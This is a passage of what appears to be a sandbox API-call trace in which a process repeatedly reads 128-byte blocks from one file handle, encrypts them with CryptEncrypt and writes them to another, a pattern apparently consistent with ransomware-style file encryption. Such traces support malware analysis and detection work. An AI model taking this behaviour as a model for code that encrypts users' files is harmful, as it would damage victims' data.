pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.095] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.095] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.095] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.095] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.095] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.095] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.095] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.096] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.096] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.096] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.096] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.096] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.096] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.096] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.096] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.096] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.097] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.097] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.097] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.097] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.097] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.097] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.097] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.097] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.097] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.098] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.098] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.098] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.098] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.098] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.098] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.098] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.099] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.099] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.099] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.099] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.099] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.099] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.099] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.099] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.099] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.100] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.100] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.100] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.100] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.100] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.100] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.100] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.100] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.100] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, 